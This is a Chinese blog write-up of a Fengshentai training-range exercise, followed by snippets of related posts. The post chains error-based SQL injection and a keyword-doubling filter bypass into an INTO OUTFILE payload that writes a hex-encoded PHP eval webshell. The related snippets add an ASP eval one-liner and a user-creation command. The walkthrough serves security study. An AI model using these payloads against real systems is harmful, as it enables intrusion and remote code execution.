封神台-尤里的复仇II 回归sql-注入绕过防护getshell

已于 2023-01-14 19:33:21 修改
阅读量701 收藏 2
点赞数 1
文章标签: 安全
于 2023-01-14 19:26:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72592923/article/details/128686839
版权
文章讲述了通过一个靶场链接发现后台登录页面,并通过SQL注入技术探测到数据库路径。利用盲注技巧,作者写入了一个PHP一句话木马,并成功创建了文件ttt1.php。最后,计划使用菜刀蚁剑工具进行远程连接。
摘要由CSDN通过智能技术生成

http://cntj8003.ia.aqlab.cn/bees/admin/login.phpz

直接在给出的靶场链接后面加上admin回车,跳转到后台登录页面,没有做目录扫描

1、在用户名处加上'测试,发现报错,存在注入漏洞

2、尝试报错注入

将用户名改为:admin' or extractvalue(1,concat(0x7e,database())) #

爆数据库安装路径admin' or extractvalue(1,concat(0x7e,@@basedir)) #

phpstudy,哈哈,盲猜网站的web路径为D:/phpStudy/ WWW

找个写入SQL写入一句话木马的payload

admin'+un+union+ion+seselectlect+1,2,3,4,0x3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E++in+into+ououtfiletfile+'D:/phpStudy/www/ttt1.php'--+

其中0x为16进制编码的开头,3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E为<?php @eval($_POST['123']);?>的16进制编码,其他内容请参考其他博主的博客~~

 访问http://cntj8003.ia.aqlab.cn/ttt1.php

上菜刀蚁剑进行连接

 

 

end。 

其实后台密码,我上来就admin+admin登录了,靶场的弱口令习惯了哈哈,但是没有进后台去上传的方式来getshell,哈哈。

小手揣兜夏夏
关注
神台尤里复仇回归绕过防护getshell
Bu2n的博客
01-05 3532
解题思路 习惯在url后加admin,看是不是管理后台。 一看发现是,就不用目录扫描工具了 填入正确的验证码,抓包输入',查看有无报错 发现报错了,存在报错注入,看报错描述可以知道是字符型注入 查看当前数据库 payload ' or extractvalue(1,concat(0x7e,database()))%23 查看当前库的所有表 payload ' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from info
神台----尤里复仇I-第二章:遇到阻难!绕过WAF过滤!
正在学习的路上...
07-18 3534
1.找注入点 进去之后,查看新闻,一般在这里有注入点。 输入 ?id=168 and 1=1 过滤了一些关键字,通过测试没有过滤 == order by == 2.猜列数、报显示位 通过测试,发现查询了10列 ?id=171 order by 10 ?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位 3.查看数据库版本和当前数据库名 ?id=1...
神台靶场-sql-注入绕过防护getshell
weixin_43446292的博客
03-10 5569
url为http://rhiq8003.ia.aqlab.cn/bees/,此页面尝试sql注入,不成功;在路径后面加admin可以跳转到管理员登录界面, http://rhiq8003.ia.aqlab.cn/bees/admin 在登录框测试sql注入,输入admin’/123456(直接使用admin/admin即可成功登录) 报错,存在字符型注入,使用报错注入进行测试,根据响应结果可知对and过滤,使用双写 admin’ an and d updatexml(1,concat(0x7e,(sel
CTF神台 第二章:遇到阻难!绕过WAF过滤!
最新发布
2302_79513487的博客
09-04 165
众所周知,cookie是用来验证身份的,那如果我们把注入参数塞到cookie里面,是不是就可以轻松的绕过了,废话不多说,我们开始实战。然后我们拿目录扫描工具(dirsearch、菜刀爬站版、御剑等)FUZZ一下。admin和b9a2a2b5dffb918c(MD5解密为welcome)可以看出来存在cookie注入漏洞,接下来我们就可以往里面输入注入参数了。我们在进行SQL注入渗透测试的时候,往往会碰到以下这种情况。2,3,7,8,9字段可以注入。首先F12呼出控制台。最后成功拿到flag。
神台靶场学习-sql-注入绕过防护getshell
buggun6的博客
11-19 439
很好,没花啥功夫就找到了上传点,要求我们只允许上传的图片类型:gif|jpeg|png|jpg|bmp。总结:这次靶场个人感觉质量还是挺高的,和之前省赛的题有点像, 自己要坚持努力学习!好的进入后台了,现在要找flag很明显就不得不找找文件上传点写码上传试试了。很明显没有返回我们想要的东西,联合注入这条路估计是行不通了。ok,既然拿到用户名和密码了,不直接登录还有其他选项吗。解密发现密码也是admin,好家伙,弱口令是吧(nice,报错注入可以,我们发现数据库了。
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 564
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合利用,成功拿到flag
神台靶场-尤里复仇-第二章
weixin_58373549的博客
01-29 686
神台靶场-尤里复仇-第二章:遇到阻难!绕过WAF过滤!【配套课时:SQL注入攻击原理 实战演练】
神台尤里复仇回归)渗透第一步 信息收集1
Bu2n的博客
01-02 4919
前言解题过程 前言 做这道题的时候,我的心情真是跌宕起伏。。为什么这么说,且听我娓娓道来。 解题过程 打开传送门,被传送到这个网站 随便点了几个模块,感觉都没有可利用的漏洞,直接扫描目录去了 扫到了admin目录,这个应该是后台登录网址,打开一看果然是 一开始密码暴力破解,没有破解到,开始有点烦躁。 (暴力破解.jpg)这里就不放burp破解的图了,有兴趣可以自己去试 然后想是否存在sql注入绕过密码登录的方法,试了试 无果 那报错注入呢? 输入 ' or gtid_subset(concat.
神台----尤里复仇I-第五章:进击!拿到Web最高权限!
正在学习的路上...
07-18 1938
1.使用cookie进入后台 根据提示信息 需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****}, 点击之前,打开Burp,进行抓包,替换cookie 放行,进入后台页面。 2.找上传点 在产品管理-添加产品中可以上传图片。 上传带asp一句话的图片, asp一句话:<%eval request (“hacker”)%> 木马一般会被拦截...
神台----尤里复仇I-第六章:SYSTEM!POWER!
正在学习的路上...
07-19 1525
通过上一章,上传的shell,使用菜刀连接 右键点击 输入命令 whoami 权限不足,这里需要用到提权工具,工具在 就不用再上传了。 右键点击cmd.exe,打开虚拟终端,输入whoami,可以看到当前用户。 尝试创建用户命令: net user 110 110 /add 还是权限不足。 这是因为cmd需要用到外部接口wscript.shell。 但是wscript.shell仍然...
神台 尤里复仇II 回归 信息收集1&&2
shierbai的博客
05-13 284
正常去做信息收集时,看到config文件都是见猎心喜的,这里虽然没直接写flag,但也该多尝试,事实证明,这个尝试是正确的。这里说有sql注入,那么就要找注入点,之前把熊海cms这个指纹识别了,直接去搜索一波。其实在页面源码处也能看到一些可能存在sql注入的点,(这里也是到处点了一波,例如什么。一个可疑的files,一堆php和txt里脱颖而出,对files进行目录扫描。这里被遮住感觉是提示,但说了是基础目录扫描,御剑启动!找到这个,但感觉是后面可能用的,说明是熊海cms。
SQL注入-9种绕过Web应用程序防火墙的方式.rar
09-25
SQL注入-9种绕过web应用程序防火墙的方式,属于比较基础的,可以学习参考
尤里复仇II 回归
sparename的博客
09-07 1086
尤里复仇II 回归渗透第一步-信息收集 1渗透第一步-信息收集 2 渗透第一步-信息收集 1 Tips: 信息收集作为渗透测试的第一步,能决定后续测试的走向,甚至能直接找到目标的漏洞,那么如何才能在繁杂的网络世界里找到所需的数据呢? 尤里开始了努力…… 最终他找到了目标的…… 成功掌握了这一技能 基础目录扫描 传送门 题解:非常简单的目录扫描 直接用御剑扫描 不过flag在二级目录里 flag_{oh!you_find_it!} 渗透第一步-信息收集 2 Tips: 经过上次的事件,尤里
SQL注入安全狗直接getshell
qq_42042353的博客
09-26 446
实验环境 1、phpstudy搭建的SQLi-Labs(MySQL) 2、安全狗4.0 成功所需要的条件 1、准备一个可以过狗过杀软的一句话 2、网站目录的绝对路径 直接进入正题 普通的注入攻击直接被安全狗拦截 比方说我们获取到的网站绝对路径为“C:/phpStudy4IIS/WWW/” (这里获取网站绝对路径有很多方式,不一一说明) 这里用到的注入用的是MySQL的数据导入功能“LINES TERMINATED BY” 它的功能就是将我们构造好的字符串直接导入在具体的文件里。很多waf并没有对MySQL
神台 -尤里复仇Ⅰ write up 夜车星繁的博客
夜车星繁的博客
04-09 2730
无意间知道了这个靶场,可作为复习用,就将它安排进了复习计划里,在此篇博客写下记录留作未来回顾用。因为有了点基础在此写下payload只保证自己可以看得懂。 第一章:为了女神小芳! ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 ?id=1 order by 2 ------查询了两列 ?id=100 select 1...
sql 整改措施 注入_浅谈SQL注入绕过
weixin_39826080的博客
12-30 165
前段时间一学弟一直叫我帮他弄防护过的网站,加上项目上总是跟开发“斗志斗勇”,漏洞改一次,我绕过一次,就这么循环反复。改完后说还存在这个漏洞,某开发的表情是这样的然后我默默的发了两张图给他觉得还是写一篇SQL注入绕过的文章吧,来安慰安慰我跟“这帮不好好改漏洞的开发”斗智斗勇、殚精竭虑的心!呸!说错了,想分享技术,然后换棒棒糖的心情!0X01 浅析绕过在我们遇到一些整改过的或者加了安全设备的网站时,总...
尤里复仇II 回归【7题】
feiniaotjx的博客
10-23 2890
尤里复仇II 回归【7题】渗透第一步-信息收集 1渗透第一步-信息收集 2基础环境搭建sqlmap尝鲜题 渗透第一步-信息收集 1 扫目录,但是要从files目录扫,(看了wp才知到) http://oovw8022.ia.aqlab.cn:8022/caidian/files/ 渗透第一步-信息收集 2 这个cms在网上搜了,没有找到,应该是迷惑我们的 看使用说明得知是海熊cms 查询到了cms,就可以在网上找payload了(也可以自己测试),手动无果,再用sqlmap 得到数据库 得表 得字段
神台-getshell
xixihahawuwu的博客
11-26 454
有个小提示 进入靶场 御剑扫描一下 我们得到了一个admin/login.php 这个看着就很敏感。猜测是管理员的登录界面 访问进去果然是管理员的登录界面 我们转到虚拟机中去,使用bp抓下包 这里可能有的盆友和我一样,一开始验证码的模块没有显示出来。得调一下比例才可以把验证码的框显示出来。虚拟机浏览器比例的问题 输入用户名密码验证码,抓包 发送到repeater模块 寻找注入点 先尝试着在用户名处修改 存在注入点。这里有一个问题,就是我在第一次抓包修改用户名上传后返回的提示信息是验证码不正确,猜测这里.
TD-LTE通信技术:现状、关键与未来展望
【TD-LTE通信技术概述】 TD-LTE,全称为Time Division Duplex Long Term Evolution,即时分双工长期演进,是3GPP组织定义的一种4G移动通信标准,是TD-SCDMA(时分同步码分多址)向4G演进的路径。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值